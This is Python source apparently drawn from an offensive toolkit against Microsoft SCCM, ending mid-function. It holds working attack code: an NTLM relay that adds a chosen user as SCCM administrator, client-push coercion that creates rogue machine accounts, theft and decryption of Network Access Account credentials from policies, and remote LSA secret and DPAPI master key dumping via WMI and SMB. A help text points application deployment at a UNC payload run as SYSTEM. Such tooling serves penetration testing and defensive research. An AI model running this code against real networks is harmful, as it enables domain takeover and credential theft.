import typer
from lib.attacks.show import SHOW
from lib.logger import init_logger

app = typer.Typer()
COMMAND_NAME = 'show'
HELP = 'Show and/or recon table results.'

@app.callback(no_args_is_help=True, invoke_without_command=True)

def main(       
    siteservers     : bool   = typer.Option(False, "-siteservers", help="Show SiteServers table"),
    dbs             : bool   = typer.Option(False, "-dbs", help="Show SiteDatabases table"),
    mps             : bool   = typer.Option(False, "-mps", help="Show ManagementPoints table"),
    users           : bool   = typer.Option(False, "-users", help="Show SCCM related users."),
    computers       : bool   = typer.Option(False, "-computers", help="Show SCCM related computers."),
    groups          : bool   = typer.Option(False, "-groups", help="Show SCCM related groups."),
    creds           : bool   = typer.Option(False, "-creds", help="Show recovered SCCM credentials."),
    all             : bool   = typer.Option(False, "-all", help="Show all recon results."),
    json            : bool   = typer.Option(False, "-json", help="Export chosen results in JSON."),
    csv             : bool   = typer.Option(False, "-csv", help="Export chosen results in CSV."),
    debug           : bool   = typer.Option(False, "-debug", help="Enable Verbose Logging")):


    logs_dir = init_logger(debug)
    show  = SHOW(users=users, computers=computers, groups=groups, creds=creds, all=all, logs_dir=logs_dir, site_servers=siteservers, site_dbs=dbs, mps=mps, csv=csv, js=json, debug=debug)
    show.run()



import argparse

class PARSERS:

#cmd2 settings parsers
    def interact_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('device', action="store", help="Device ResourceID you want to interact with.")
        return parser
    
    def cd_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('path', action="store", help="path to change directories to. Ex: C:\\Users\\")
        return parser



#database parsers
    def get_device_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('device', action="store", help="Query for device information")
        return parser
    
    def get_user_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('user', action="store", help="Query for user information")
        return parser
    
    def get_collection_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('collection_id', action="store", help="Query for collection information. Use a '*' to list all collections.")
        return parser

    def get_collection_members_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('collection_id', action="store", help="Query for all members of a collection.")
        return parser

    def get_puser_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('user', action="store", help="Find devices the target user is a primary user of.")
        return parser        

    def get_lastlogon_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('user', action="store", help="Find devices the target user recently logged into.")
        return parser    
    
    
    #Application Parser
    
    def application_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('-t', '--target', action='store', help="ResourceID to target for application deployment")
        parser.add_argument('-c', '--collection-type', action='store', help='Collection type to create for application deployment', choices=['user', 'device'])
        parser.add_argument('-p', '--path', action="store", help='Command or UNC path of the binary/script to execute. Ex: \\\\10.10.10.10\\payload.exe')
        parser.add_argument('-s', '--system', action="store_true", help='Run the application as NT AUTHORITY\\SYSTEM', default=False)
        parser.add_argument('-n', '--name', action="store", help="Name of the application")
        parser.add_argument("--collection-id", action="store", help="Id of existing collection to target")
        return parser
    
    #Powershell Script Parsers
    def cat_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('filename', action="store", help="Filename to display contents for.")
        return parser    
    
    def script_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('script', action="store", help="Script name or path to script")
        return parser    

    
    def delete_script_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('script_guid', action="store", help="GUID of target script to delete. Use list_scripts to get the GUID.")
        return parser    
    
    def get_script_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('script_guid', action="store", help="GUID of target script to view.")
        return parser   
    
    
    # cmpivot parsers
    def do_sessionhunter_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('user', action="store", help="Target user to find sessions for")
        return parser
    
    
    #add admin parsers
    def do_add_admin_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('-u', '--user', action='store', help='Target username to add as an admin', required=True)
        parser.add_argument('-s', '--sid', action='store', help="Target user's sid to add as an admin ", required=True)
        return parser
    
    def do_delete_admin_parser():
        parser = argparse.ArgumentParser()
        parser.add_argument('user', action='store', help="Target admin username to remove")
        return parser
    
# creds extraction


    def do_decrypt_parsers():
        parser = argparse.ArgumentParser()
        parser.add_argument('blob', action='store', help="Encrypted blob to decrypt")
    


import typer
import asyncio
from lib.attacks.relay import HTTPSCCMRELAY
from lib.logger import init_logger

app = typer.Typer()
COMMAND_NAME = 'relay'
HELP = 'SCCM TAKEOVER-5 Attack'

@app.callback(no_args_is_help=True, invoke_without_command=True)

def main(
    target          : str   = typer.Option(None, "-t",  help="Target SCCM SMS Provider IP or hostname. "),
    target_user     : str   = typer.Option(None, "-tu",  help="Target username to add as SCCM admin. Ex: domain\\username"),
    target_sid      : str   = typer.Option(None, "-ts",  help="Target user's SID to add as SCCM admin. Ex: S-1-5-21-123456789...."),
    interface       : str   = typer.Option("0.0.0.0", "-i",  help="Interface to listen on."),
    port            : int   = typer.Option(445, "-p",  help="Port to listen on."),
    timeout         : int   = typer.Option(5, "-to", help="Timeout value."),
    verbose         : bool  = typer.Option(False, "-v", help="Enable verbose logging.")
):


    init_logger(verbose)
    http_relay = HTTPSCCMRELAY(target=target, target_user=target_user, target_sid=target_sid, interface=interface, port=port, timeout=timeout, verbose=verbose)
    http_relay.start()


from cryptography.hazmat.primitives import serialization
from lib.ldap import init_ldap_session
from lib.logger import console, logger, init_logger
from lib.attacks.find import SCCMHUNTER
from lib.scripts.addcomputer import AddComputerSAMR
from lib.scripts.sccmwtf import SCCMTools, Tools
from lib.scripts.banner import show_banner
import requests
import getpass
import random
import string
import sqlite3
import ldap3
import time
import sys
import os
import re


class HTTP:
    
    def __init__(self, username=None, password=None, domain=None, target_dom=None,
                    dc_ip=None,ldaps=False, channel_binding=False, signing=False, kerberos=False, no_pass=False, hashes=None,
                    aes=None, debug=False, auto=False, computer_pass=None, computer_hash=None,computer_name=None,
                    uuid=None, mp=None, sp=False, spcn=None, sppid=None, spanon=False,sleep=None, logs_dir=None):
        self.username = username
        self.password = password
        self.domain = domain
        self.target_dom = target_dom
        self.dc_ip = dc_ip
        self.ldaps = ldaps
        self.channel_binding = channel_binding
        self.signing = signing
        self.kerberos = kerberos
        self.no_pass = no_pass
        self.hashes=hashes
        self.aes = aes
        self.debug = debug
        self.ldap_session = None
        self.search_base = None
        self.auto = auto
        self.computer_name = computer_name
        self.computer_hash = computer_hash
        self.computer_pass = computer_pass
        self.uuid = uuid
        self.mp = mp
        self.sp = sp
        self.spcn = spcn
        self.sppid = sppid
        self.spanon = spanon
        self.sleep = int(sleep)
        self.targets = []
        self.logs_dir = logs_dir
        self.database = f"{logs_dir}/db/find.db"
        self.conn = sqlite3.connect(self.database, check_same_thread=False)

 
    def run(self):
        if self.sp:
            self.sccm_push()
            return
        if self.uuid:
            self.manual_request()
            return
        if self.mp:
            self.autopwn()
        if os.path.exists(self.database):
            try:
                logger.info("[*] Searching for Management Points from database.")
                targets = set()
                mpscheck = self.conn.execute(f'''select Hostname FROM ManagementPoints''').fetchall()
                allcompscheck = self.conn.execute(f"SELECT Hostname FROM Computers WHERE ManagementPoint = 'True'").fetchall()
                for mp in mpscheck:
                    targets.add(mp[0])
                for mp in allcompscheck:
                    targets.add(mp[0])
                
                self.targets = self.http_hunter(targets)
                #print(targets)
                if self.targets:
                    self.autopwn()
            except sqlite3.OperationalError:
                logger.debug("[*] Database file not found. Did you run the find module?")
            except Exception as e:
                logger.info("An unknown error occured. Use -debug to print a stacktrace.")
                logger.debug(e)

    def manual_request(self):
        logger.info(f"Submitting manual policy request from previous registration {self.uuid}")
        try:
            #TODO: Need some terminal output for actions taken
            #      Need better error handling
            target_mp_url = f"http://{self.mp}"
            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir,sp=self.sp,plid=self.sppid)
            with open (f"{self.logs_dir}/{self.uuid}.data", "rb") as f:
                data = f.read()
            with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:
                key = serialization.load_pem_private_key(g.read(), password=b"mimikatz")
            deflatedData = sccmwtf.sendCCMPostRequest(data=data, mp=target_mp_url)
            result = re.search(r"PolicyCategory=\"NAAConfig\".*?<!\[CDATA\[https*://<mp>([^]]+)", deflatedData, re.DOTALL + re.MULTILINE)
            urls = [result.group(1)]
            for url in urls:
                result = sccmwtf.requestPolicy(url)
                if result.startswith("<HTML>"):
                        result = sccmwtf.requestPolicy(url, self.uuid, True, True, key=key)
                        decryptedResult = sccmwtf.parseEncryptedPolicy(result)
                        sccmwtf.parse_xml(decryptedResult)
                        file_name = f"{self.logs_dir}/loot/naapolicy.xml"
                        Tools.write_to_file(decryptedResult, file_name)
                        logger.info(f"[+] Done.. decrypted policy dumped to {self.logs_dir}/loot/naapolicy.xml")
                        return True
        except FileNotFoundError:
            logger.info(f"Missing required files -- check the UUID.")
        except Exception as e:
            logger.info(e)
        
#examples:
# A. with an already compromised machine account:
#       python3 sccmhunter.py http  -mp '<target>' -cn  '<compromised_machine>$' -ch '<compromised_machine_ntlm_hash>' -sleep 10 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP>  -d <DOMAIN> 
# B. with a user/machine account that will (1)created a new machine account in the domain  (2) register a new client;
#       python3 sccmhunter.py http  -mp <target> -u '<username>' -p <password> -sleep 3 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP> -d <DOMAIN>
# C. Unauthenticated registration => unapproved client but still triggers the sccm push (may not work in certain cases) (actually very efficient during tests)
#        python3 sccmhunter.py http  -mp <target> -sleep 10 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP> -d <DOMAIN> -sppid 'Microsoft Windows NT Server 10.0' --sccm-push-anonymous
    def sccm_push(self):
        logger.info(f"[*] Performing SCCM client push attack")
        key = None

        if self.uuid:
            logger.info(f"Detected uuid, trying to reuse alreday created client with uuid: {self.uuid}, \n[!] probably wont work since client needs to be not installed to trigger sccm push... ")
            with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:
                key = serialization.load_pem_private_key(g.read(), password=b"mimikatz")
        elif (self.computer_name and (self.computer_pass or self.computer_hash)) :
            logger.info(f"Detected provided computer name and credentials, trying to reuse already existing computer to enroll a new client !")
            if not self.computer_pass:
                self.computer_pass = '0'*32 + ':' + self.computer_hash
        elif (self.spanon):
            pass
        else:
            if not (self.username and (self.password or self.hashes)):
                logger.info("Missing user credentials, check your arguments and try again. You can also perform unauthenticated client registration --sccm-push-anonymous")
                sys.exit(1)
            if not (self.spcn):
                logger.info("[-] Client Name (-spcn) required when usign sccm push attack")
                sys.exit(1)
            logger.info("[*]Attempting to add a machine account then trigger sccm push.")
            self.computer_name = f'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')
            self.computer_pass = f''.join(random.choice(string.ascii_letters + string.digits) for _ in range(12))
            samradd = AddComputerSAMR(self.username, self.password, self.domain, self.hashes, self.aes, self.kerberos, 
                                   self.dc_ip, self.computer_name, self.computer_pass)
            samradd.run()

            if self.validate_add(self.computer_name):
                logger.info(f'[+] {self.computer_name} created with password: {self.computer_pass}')
            else:
                logger.info(f'[-] Could not validate successful creation.')
       
            if not (self.computer_name or self.computer_pass):
                logger.info("[-] Missing machine account credentials, check your arguments and try again.")
                sys.exit()
        
        target_fqdn = f'{self.spcn.upper()}'
        sccmwtf = SCCMTools(target_name=self.spcn, target_fqdn=target_fqdn, 
                            target_sccm=self.mp,target_username=self.username, 
                            target_password=self.password, sleep=self.sleep, 
                            logs_dir=self.logs_dir,sp=self.sp,plid=self.sppid)
        try:
            uuid = self.uuid
            if not uuid:
                sccmwtf.createCertificate(True)
                uuid = sccmwtf.sendRegistration(self.spcn, target_fqdn,self.computer_name,self.computer_pass,isauthenticated=(not self.spanon),policies=False)
                sccmwtf.rename_key(uuid) #save key for reuse
                key = sccmwtf.key
                logger.info(f"[+] Client {self.spcn} registered with UUID: {uuid}")
                logger.info(f"[*] Waiting {self.sleep} seconds for database to update.")
                time.sleep(self.sleep)
            sccmwtf.sccmPush(uuid,self.spcn,self.domain,self.sppid,self.computer_name,self.computer_pass,key=key)
        except Exception as e:
            print(e)
            logger.info("[-] Something wrong occured")

    def autopwn(self):
        if self.auto:
            if not (self.username or self.password):
                logger.info("Missing user credentials, check your arguments and try again.")
                sys.exit()
            logger.info("[*] User selected auto. Attempting to add a machine account then request policies.")
            self.computer_name = f'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')
            self.computer_pass = f''.join(random.choice(string.ascii_letters + string.digits) for _ in range(12))
            samradd = AddComputerSAMR(self.username, self.password, self.domain, self.hashes, self.aes, self.kerberos, 
                                   self.dc_ip, self.computer_name, self.computer_pass)
            samradd.run()

            if self.validate_add(self.computer_name):
                logger.info(f'[+] {self.computer_name} created with password: {self.computer_pass}')
            else:
                logger.info(f'[-] Could not validate successful creation.')

        if self.computer_name and self.computer_hash and not self.computer_pass:
            self.computer_pass = '0'*32 + ':' + self.computer_hash

        if not (self.computer_name or self.computer_pass):
            logger.info("[-] Missing machine account credentials, check your arguments and try again.")
            sys.exit()


        if self.mp:
            self.targets = []
            self.targets.append(self.mp)
        for target in self.targets:
            target_name = self.computer_name[:-1]
            target_fqdn = f'{target_name}.{self.domain}'
            try:
                logger.info(f"[*] Attempting to grab policy from {target}")
                SCCMWTF=SCCMTools(target_name, target_fqdn, target, self.computer_name, self.computer_pass, self.sleep, self.logs_dir)
                SCCMWTF.sccmwtf_run()
            except Exception as e:
                logger.info(e)

    def http_hunter(self, servers):
        validated = []                   
        for server in servers:
            url=(f"http://{server}/ccm_system_windowsauth")
            url2=(f"http://{server}/ccm_system")
            try:
                x = requests.get(url, timeout=5)
                x2 = requests.get(url2,timeout=5)
                if x.status_code == 401:
                    logger.info(f"[+] Found {url}")
                    validated.append(server)
            except requests.exceptions.Timeout:
                logger.info(f"[-] {server} connection timed out.")
            except requests.ConnectionError as e:
                logger.info(f"[-] {server} doesn't appear to be a SCCM server.")
                pass
        if validated:
            return validated
        else:
            print("[-] No HTTP endpoints found :(")


    def validate_add(self, computername):
        lmhash = ""
        nthash = ""
        
        if self.hashes:
            lmhash, nthash = self.hashes.split(':')
        if not (self.password or self.hashes or self.aes or self.no_pass):
                self.password = getpass("Password:")

        # set search base to query
        if self.target_dom:
            self.search_base = self.get_dn(self.target_dom)
        else:
            self.search_base = self.get_dn(self.domain)

        try:
            ldap_server, self.ldap_session = init_ldap_session(domain=self.domain, username=self.username, password=self.password,
                                                           lmhash=lmhash, nthash=nthash, kerberos=self.kerberos, domain_controller=self.dc_ip,
                                                           aesKey=self.aes, hashes=self.hashes, ldaps=self.ldaps, channel_binding=self.channel_binding, signing=self.signing)
            logger.debug(f'[+] Bind successful {ldap_server}')
            try:
                controls = ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x07)
                self.ldap_session.extend.standard.paged_search(self.search_base, 
                                                               search_filter=f"(samaccountname={computername})", 
                                                               attributes="nTSecurityDescriptor", 
                                                               generator=False)
                return True
            except ldap3.core.exceptions.LDAPAttributeError as e:
                print()
                logger.info(f'[-] Error: {str(e)}')
                return False

        except ldap3.core.exceptions.LDAPSocketOpenError as e: 
            if 'invalid server address' in str(e):
                logger.info(f'[-] Invalid server address - {self.domain}')
            else:
                logger.info('[-] Error connecting to LDAP server')
                print()
                logger.info(e)
            return False
        except ldap3.core.exceptions.LDAPBindError as e:
            logger.info(f'[-] Error: {str(e)}')
            return False
        

    def get_dn(self, domain):
        components = domain.split('.')
        base = ''
        for comp in components:
            base += f',DC={comp}'
        
        return base[1:]



# Original Script: https://github.com/ThePorgs/impacket/blob/master/examples/SystemDPAPIdump.py
# Module Author: @s1zzzz

import logging
import ntpath
import re
import sys
import sqlite3
import time
from binascii import unhexlify, hexlify
from io import BytesIO
from getpass import getpass

from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dpapi import MasterKeyFile, MasterKey, DPAPI_BLOB
from impacket.examples.secretsdump import RemoteOperations, LSASecrets
from impacket.smbconnection import SMBConnection, SessionError
from impacket.uuid import bin_to_string

from lib.logger import logger


class DPAPIHunter:
    def __init__(self, remoteName, username=None, password='', domain='', kerberos=False,
                 no_pass=False, hashes=None, aesKey=None, debug=False, kdc=None, logs_dir=None, wmi=True, disk=False, both=False):

        self.target = remoteName
        self.username = username
        self.password = password
        self.domain = domain
        self.doKerberos = kerberos or aesKey is not None
        self.no_pass = no_pass
        self.hashes = hashes
        self.aes = aesKey
        self.debug = debug
        self.kdc = kdc
        self.logs_dir = logs_dir

        self.dumpAll = both
        self.dumpWmi = wmi
        self.dumpDisk = disk
        

        if self.hashes:
            if self.hashes.find(":") != -1:
                self.lmhash, self.nthash = self.hashes.split(':')
            else:
                self.nthash = self.hashes
        if not (self.password or self.hashes or self.aes or self.no_pass):
            self.password = getpass("Password:")


        self.smb = SMB(self.target, self.username, self.password, self.domain, self.doKerberos, self.no_pass, self.hashes, self.aes, self.debug, self.kdc)
        self.dpapi = DPAPI(self.target, self.username, self.password, self.domain, self.doKerberos, self.no_pass, self.hashes, self.aes, self.debug, self.kdc, self.smb)        
        self.wmi = WMI(self.target, self.username, self.password, self.domain, self.doKerberos, self.no_pass, self.hashes, self.aes, self.kdc, self.dpapi, self.logs_dir)

    def run(self):
        if self.dumpAll:
            self.dump_wmi()
            self.dump_disk()
        elif self.dumpWmi:
            self.dump_wmi()
        elif self.dumpDisk:
            self.dump_disk()
        else:
            logger.info("[-] No operation specified")
        
        self.cleanup()
        
    def dump_wmi(self):
        print()
        logger.info("[*] Starting SCCM secrets extraction via WMI\n")
        
        # https://github.com/garrettfoster13/sccmhunter/pull/32
        namespace = 'root\\ccm\\Policy\\Machine\\ActualConfig'

        iWbemServices = self.wmi.connect_to_namespace(namespace)

        queries = [
            'SELECT NetworkAccessUsername, NetworkAccessPassword FROM CCM_NetworkAccessAccount',
            'SELECT TS_Sequence FROM CCM_TaskSequence',
            'SELECT Name, Value FROM CCM_CollectionVariable'
        ]

        for query in queries:
            iEnum = iWbemServices.ExecQuery(query)
            self.wmi.parseReply(iEnum)     

        if self.wmi.found_naa_credentials is False and self.wmi.found_task_sequence is False and self.wmi.found_collection_variables:
            logger.info(f"[!] No SCCM secrets found using WMI, try -disk dump")
            #return # would exit, but possibility of disk dump
        else:
            logger.debug(f"[*] Got SCCM secrets from WMI namespace '{namespace}'")
        
        print()
        logger.info("[*] WMI SCCM secrets dump complete")
        self.wmi.disconnect()
        return      

    def dump_disk(self):
        print()
        logger.info("[*] Starting SCCM secrets extraction from disk\n")

        self.wmi.connect_to_dcom()

        share = 'C$'
        original_filepath = 'Windows\\System32\\wbem\\Repository\\OBJECTS.DATA'
        filename = 'OBJECTS.DATA'       

        logger.debug(f"[*] Copying the OBJECTS.DATA file to C:\\Windows\\Temp\\{filename}")
        
        self.wmi.exec(f"cmd.exe /Q /c copy \"C:\\{original_filepath}\" \"C:\\Windows\\Temp\\{filename}\"")
        time.sleep(2)
        
        temp_filepath = 'Windows\\Temp\\'
        data = self.smb.getFileContent(share, temp_filepath, filename)

        result = self.parseFile(data)

        if result:
            logger.info("[*] SCCM secrets dump complete")     
        else:
            logger.info("[!] No SCCM secrets found in CIM Repository.")
        
        logger.debug("[*] Deleting the OBJECTS.DATA file from C:\\Windows\\Temp")
        self.wmi.exec(f"cmd.exe /Q /c del \"C:\\Windows\\Temp\\{filename}\"")

    def parseFile(self, data) -> None:

        foundCreds = False
        
        if(data is None):
            logger.info("[!] Unable to retrieve the OBJECTS.DATA file.")
            return

        regex_dict = {
            "NAA Credentials": br"CCM_NetworkAccessAccount.*<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>.*<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>",
            "Task Sequences": br"</SWDReserved>.*<PolicySecret Version=\"1\"><!\[CDATA\[(.*?)\]\]><\/PolicySecret>",
            "Collection Variables": br"CCM_CollectionVariable\x00\x00(?P<CollectionVariableName>.*?)\x00\x00.*<PolicySecret Version=\"1\"><!\[CDATA\[(?P<CollectionVariableValue>.*?)\]\]><\/PolicySecret>",
            "Other Secrets": br"<PolicySecret Version=\"1\"><!\[CDATA\[(?P<OtherSecret>.*?)\]\]><\/PolicySecret>"
        }
        
        for sccm_data_type, regex in regex_dict.items():
            logger.debug(f"[*] Looking for {sccm_data_type}")

            pattern = re.compile(regex, re.MULTILINE | re.IGNORECASE)
            matches = list(pattern.finditer(data))

            if matches:
                logger.info(f"[+] Found {sccm_data_type}")
                foundCreds = True

                for match in matches:
                    match sccm_data_type:
                        case "NAA Credentials":
                            naa_username = self.dpapi.decrypt_blob(unhexlify(match.group(2))[4:])
                            naa_password = self.dpapi.decrypt_blob(unhexlify(match.group(1))[4:])
                            SCCMSecret("NAA", naa_username, naa_password).dump(self.logs_dir)
                        case "Task Sequences":
                            task_sequence = self.dpapi.decrypt_blob(unhexlify(match.group(1))[4:])
                            SCCMSecret("Task Sequence", None, task_sequence).dump()
                        case "Collection Variables":
                            SCCMSecret("Collection Variable", match.group(1).decode('utf-8'), self.dpapi.decrypt_blob(unhexlify(match.group(2))[4:])).dump()
                        case "Other Secrets":
                            try:
                                logger.info(f"\t- Plaintext secret: {self.dpapi.decrypt_blob(unhexlify(match.group(1))[4:])}")
                            except:
                                continue
            else:
                continue
        
        return foundCreds

    def cleanup(self):
        if self.smb:
            self.smb.disconnect()

class DPAPI:
    def __init__(self, remoteName, username=None, password='', domain='', kerberos=False,
                 no_pass=False, hashes=None, aesKey=None, debug=False, kdc=None, smb_instance=None):
        
        
        self.target = remoteName
        self.username = username
        self.password = password
        self.domain = domain
        self.doKerberos = kerberos or aesKey is not None
        self.no_pass = no_pass
        self.hashes = hashes
        self.aes = aesKey
        self.debug = debug
        self.kdc = kdc

        self.dpapiSystem = {}
        self.smb = smb_instance

        self.raw_masterkeys = {}
        self.masterkeys = {}

        self.share = 'C$'
        self.mk_path = '\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\'
        self.tid = self.smb.smb_conn.connectTree(self.share)

        self.bootKey = None
        self.remote_ops = None
        self.lsa_secrets = None 

    def triage_masterkey(self, mkid = None):
        
        try:
            # retrieve masterkey file contents
            logger.debug("[*] Retrieving masterkey file: " + mkid)
            self.raw_masterkeys[mkid] = self.smb.getFileContent(self.share, self.mk_path, mkid)
            
            # if we can't retrieve the masterkey file, we exit
            if self.raw_masterkeys[mkid] is None:
                logger.info(f"[!] Could not get content of masterkey file: {mkid}, exiting since we can't decrypt the blob.")
                self.smb.smb_conn.disconnectTree(self.tid)
                sys.exit(1)
            
            # if we can retrieve the masterkey file, then we proceed to extract the bootkey
            logger.debug("[*] Attempting to extract bootkey from the target machine")
            try:
                self.remote_ops = RemoteOperations(
                    self.smb.smb_conn, self.doKerberos, self.kdc)
                self.remote_ops.enableRegistry()
                self.bootKey = self.remote_ops.getBootKey()
            except Exception as e:
                logger.info('[!] RemoteOperations failed: %s' % str(e))
            
            
            # with the bootkey, we can now extract LSA Secrets
            logger.debug('[*] Attempting to dump LSA secrets from the target machine')
            try:
                SECURITYFileName = self.remote_ops.saveSECURITY()
                self.lsa_secrets = LSASecrets(SECURITYFileName, self.bootKey, self.remote_ops,
                                            isRemote=True, history=False,
                                            perSecretCallback=self.getDPAPI_SYSTEM)
                self.lsa_secrets.dumpSecrets()
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback
                    traceback.print_exc()
                logger.info('[!] LSA hashes extraction failed: %s' % str(e))
            
            self.cleanup()          
            
            # debug, print SYSTEM user key
            # logger.debug(f"User Key: {self.dpapiSystem['UserKey']}")
            # logger.debug(f"Machine Key: {self.dpapiSystem['MachineKey']}")
            

            # now that we have the SYSTEM user key, we can decrypt the masterkey
            if self.dpapiSystem['UserKey'] is None:
                logger.info(
                    "[!] Could not retrieve the SYSTEM user key, exiting since we can't decrypt the blob.")
                self.smb.smb_conn.disconnectTree(self.tid)
                return
            for k, v in self.raw_masterkeys.items():
                if v is None:
                    self.masterkeys[k] = None
                    continue
                data = v
                mkf = MasterKeyFile(data)
                data = data[len(mkf):]
                if not mkf['MasterKeyLen'] > 0:
                    logger.info("[!] Masterkey file " + k +
                                " has no masterkeys, skipping.")
                    continue
                mk = MasterKey(data[:mkf['MasterKeyLen']])
                data = data[len(mk):]
                decrypted_key = mk.decrypt(self.dpapiSystem['UserKey'])
                if not decrypted_key:
                    logger.info("[!] Failed to decrypt masterkey " + k + ", skipping.")
                    continue
                logger.debug("[*] Decrypted masterkey " + k + ": 0x" + hexlify(decrypted_key).decode('utf-8'))
                self.masterkeys[k] = decrypted_key
        except (Exception, KeyboardInterrupt) as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
            logger.info(e)
            try:
                self.cleanup()
            except:
                pass
        
        #self.cleanup()
        
        return

    def decrypt_blob(self, dpapi_blob=None) -> str:      

        # Identify the masterkey from the blob
        blob = DPAPI_BLOB(dpapi_blob)
        mkid = bin_to_string(blob['GuidMasterKey'])
        
        # If we don't have the masterkey, we triage it
        if mkid not in self.raw_masterkeys:
            self.triage_masterkey(mkid)
        
        key = self.masterkeys.get(mkid, None)
        if key is None:
            logger.info("[!] Could not decrypt masterkey " + mkid)
            return None
        
        
        decrypted = blob.decrypt(key)
        decoded_string = decrypted.decode('utf-16le').replace('\x00', '').replace('\\\\', '\\')
        
        #logger.info(f"Decrypted SCCM secret: {decoded_string}")
        return decoded_string

    def cleanup(self):
        if self.remote_ops:
            self.remote_ops.finish()
        if self.lsa_secrets:
            self.lsa_secrets.finish()

    def getDPAPI_SYSTEM(self,_, secret):
        if secret.startswith("dpapi_machinekey:"):
            machineKey, userKey = secret.split('\n')
            machineKey = machineKey.split(':')[1]
            userKey = userKey.split(':')[1]
            self.dpapiSystem['MachineKey'] = unhexlify(machineKey[2:])
            self.dpapiSystem['UserKey'] = unhexlify(userKey[2:])

class SCCMSecret:
    def __init__(self, item_type, key, value) -> None:
        self.item_type = item_type
        self.key = key
        self.value = value

    def dump(self, logs_dir=None) -> None:
        if self.item_type == "NAA":
            logger.info(f"\t- NetworkAccessUsername: {self.key}")
            logger.info(f"\t- NetworkAccessPassword: {self.value}")
            self.write_to_db(self.key, self.value, logs_dir)
        elif self.item_type == "Task Sequence":
            logger.info(f"\t- Task Sequence: {self.value}")
        elif self.item_type == "Collection Variable":
            logger.info(f"\t- CollectionVariableName: {self.key}")
            logger.info(f"\t- CollectionVariableValue: {self.value}")

    def write_to_db(self, username, password, logs_dir=None):
        source = "DPAPI NAA"
        database = f"{logs_dir}/db/find.db"
        conn = sqlite3.connect(database, check_same_thread=False)
        cursor = conn.cursor()
        check = "select * from Creds where Username = ?"
        cursor.execute(check, (username,))
        exists = cursor.fetchone()
        if not exists:
            cursor.execute(f'''insert into Creds (Username, Password, Source) values (?,?,?)''', (username, password, source))
            conn.commit()
        return

class SMB:
    def __init__(self, remoteName, username=None, password='', domain='', kerberos=False,
                 no_pass=False, hashes=None, aesKey=None, debug=False, kdc=None):

        self.username = username
        self.password = password
        self.domain = domain
        self.lmhash = ""
        self.nthash = ""
        self.aesKey = aesKey
        self.target = remoteName
        self.kdcHost = kdc
        self.doKerberos = kerberos or aesKey is not None
        self.hashes = hashes
        self.no_pass = no_pass
        self.hashes = hashes

        self.smb_conn = None

        
        self.connect()
        self.is_admin()

    def connect(self) -> SMBConnection:
        try:
            logger.debug(f"[*] Establishing SMB connection to {self.target}")
            self.smb_conn = SMBConnection(self.target, self.target)
            if self.doKerberos:
                logger.debug("[*] Performing Kerberos login")
                self.smb_conn.kerberosLogin(self.username, self.password, self.domain, self.lmhash,
                                               self.nthash, self.aesKey, self.kdcHost)
            else:
                logger.debug("[*] Performing NTLM login")
                self.smb_conn.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
        except OSError as e:
            if str(e).find("Connection reset by peer") != -1:
                logger.info(f"SMBv1 might be disabled on {self.target}")
            if str(e).find('timed out') != -1:
                raise Exception(f"The connection is timed out. Port 445/TCP port is closed on {self.target}")
            return None
        except SessionError as e:
            if str(e).find('STATUS_NOT_SUPPORTED') != -1:
                raise Exception('The SMB request is not supported. Probably NTLM is disabled.')
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
                logging.debug(str(e))
        
        #logger.debug("[*] SMB Connection Established!")
        return self.smb_conn

    def disconnect(self):
        logger.debug(f"[*] Closing SMB connection to {self.target}")
        self.smb_conn.logoff()

    def is_admin(self) -> bool:
        try:
            self.smb_conn.connectTree('C$')
            return True
        except Exception:
            logger.info(f"[-] User {self.username} is not an admin on {self.target}")
            sys.exit(1)

    def getFileContent(self, share, path, filename) -> bytes:
        content = None
        try:
            fh = BytesIO()
            filepath = ntpath.join(path,filename)
            self.smb_conn.getFile(share, filepath, fh.write)
            content = fh.getvalue()
            fh.close()
        except:
            return None
        return content

class WMI:
    def __init__(self, remoteName, username=None, password='', domain='', kerberos=False,
                 no_pass=False, hashes=None, aesKey=None, kdc=None, dpapi_instance=None, logs_dir=None):
        self.target = remoteName
        self.username = username
        self.password = password
        self.domain = domain
        self.lmhash = ""
        self.nthash = ""
        self.aesKey = aesKey
        self.kdcHost = kdc
        self.doKerberos = kerberos or aesKey is not None
        self.hashes = hashes
        self.no_pass = no_pass

        self.dpapi = dpapi_instance
        self.logs_dir = logs_dir
       
        self.found_naa_credentials = False
        self.found_task_sequence = False
        self.found_collection_variables = False

        self.dcom = None
        self.connect_to_dcom()

    def connect_to_dcom(self):
        try:
            logger.debug(f"[*] Establishing DCOM connection to {self.target}")
